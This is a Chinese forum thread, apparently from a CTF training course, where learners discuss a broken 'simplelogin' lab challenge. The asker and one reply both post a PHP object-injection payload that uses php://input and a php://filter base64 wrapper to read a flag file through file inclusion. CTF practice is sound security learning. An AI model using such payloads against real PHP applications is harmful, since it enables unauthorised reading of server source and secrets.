首页
社区
课程
招聘
靶场2_22_simplelogin好像存在问题,请问正确的playload是什么?

我跟着视频做,得到playload后填入没有得到flag

相关代码

?file=class.php&user=php://input&pass=
O:4:"Read":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=f1a9.php";}

你期待的结果是什么?实际看到的错误信息又是什么?

获得flag,但是并没有

收藏
3条回答
mb_cnrjzfff 2024-12-19

同问,而且index.php的注释中的代码和最后给出的不一样,而是第一次出现的那样,提示是用来获取class.php的

回复
雾痕 2025-7-30

首先要用php://filter/convert.base64-encode/resource=index.php把index.php的完整原始代码获取到手,注释里的是不完整的,然后你要用file参数把class.php包含进去,才能触发反序列化漏洞,但是他这个环境有问题,如果你把代码部署到本地,用payload:?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:52:"php://filter/convert.base64-encode/resource=f1a9.php";} 请求体里面是the user is admin是可以获取到flag的

回复
kanxue 2025-7-31 2025-7-31编辑

题目确实有些问题,讲师重新修复了,可以再做下试试。

回复
《30小时教你玩转CTF》
  参与学习     987 人
  提问次数     94 个
《30小时教你玩转CTF》;顶尖讲师团队亲授,教你深入浅出学攻防;每周一、周四更新
我的问答 领取收益
0
我的提问
0
我的回答
0
学习收益